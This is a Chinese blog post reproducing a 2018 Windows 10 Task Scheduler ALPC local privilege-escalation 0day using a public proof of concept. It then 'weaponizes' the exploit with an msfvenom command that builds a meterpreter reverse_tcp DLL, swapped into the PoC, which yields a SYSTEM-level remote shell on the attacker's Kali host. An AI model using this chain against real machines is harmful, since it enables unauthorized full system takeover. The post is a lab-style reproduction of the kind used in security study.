windows-提权0day-复现

  1. 前言:
    1. 正文
      1. 将其武器化

前言:

win10中任务调度服务导出的函数没有验证调用者的权限,任意权限的用户调用该函数可以获取系统敏感文件的写权限,进而提权。影响范围:windows10,windows server 2016昨天群里的基友们都复现了一遍也都成功了,也有基友在windows8实验了发现了也能提权成功。

Pximdg.jpg

正文

准备工作:下载POC,windows 10 镜像,Process Explorer,CFF
POC:GitHub - SandboxEscaper/randomrepo: Repo for random stuff
windows10 ISO:msdn下载
Process Explorer:Process Explorer - Windows Sysinternals | Microsoft Docs
CFF:Explorer Suite – NTCore

首先打开一个notepad
Pxi3Q0.png
并没有什么不同,执行

带有子进程conhost和notepad的cmd.exe已经生成为SYSTEM!

将其武器化

在kali执行 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > ka.dll

移动到windows10

在CFF打开ALPC-TaskSched-LPE.dll替换其msf生成的dll,然后保存


kali中执行监听命令

windows 10中执行

返回kali可以发现已经成功的反弹了一个meterpreter,并且是system权限

分析此0day的文章:漏洞预警 | Windows 10本地提权0day预警 - 安全客,安全资讯平台
转载请注明来自:422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:windows-提权0day-复现

本文作者:九世

发布时间:2018-08-31, 12:20:48

最后更新:2019-04-19, 20:36:16

原始链接:http://422926799.github.io/posts/c24b1fd3.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录